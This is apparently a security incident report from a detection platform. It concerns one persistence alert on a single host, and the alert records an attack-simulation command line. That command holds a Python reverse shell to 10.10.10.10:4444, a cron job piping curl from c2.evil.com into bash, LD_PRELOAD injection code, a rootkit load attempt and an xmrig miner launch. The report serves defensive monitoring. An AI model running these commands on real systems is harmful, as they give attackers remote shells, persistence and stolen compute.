Incident Overview

Incident ID CINC-20251220-4CE93E1A
Severity Medium (70)
Status new
Alert Count 1
Host Count 1

Timeline

First Seen 2025-12-13 17:57:08
Last Seen 2025-12-13 17:57:08
Duration 0d 0h 0m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics:
Persistence
Techniques:
External Remote Services

Affected Hosts (1)

localhost.localdomain

Related Alerts (1)

Severity High
Status new
Hostname localhost.localdomain
Description The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source.
Tactic Persistence
Command Line bash -c echo '[1] EICAR 안티바이러스 테스트 파일...' echo 'X5O\!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE\!$H+H*' > /tmp/eicar_test.com echo '[2] LD_PRELOAD 인젝션 시도...' echo 'void __attribute__((constructor)) init() { system("id"); }' > /tmp/inject.c gcc -shared -fPIC -o /tmp/inject.so /tmp/inject.c 2>/dev/null LD_PRELOAD=/tmp/inject.so /bin/ls 2>/dev/null echo '[3] Crontab C2 비콘...' (crontab -l 2>/dev/null; echo '*/1 * * * * curl http://c2.evil.com/beacon | bash') | crontab - sleep 1 crontab -r 2>/dev/null echo '[4] Kernel module 로드 시도...' insmod /tmp/fake_rootkit.ko 2>/dev/null || true echo '[5] Reverse shell via Python...' python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);subprocess.call(["/bin/sh","-i"])' 2>/dev/null & sleep 1 echo '[6] Cryptominer 시뮬레이션...' /tmp/xmrig --donate-level=1 --url=stratum+tcp://pool.minexmr.com:4444 2>/dev/null || true echo 'Done on server 62'
Time 12-13 17:57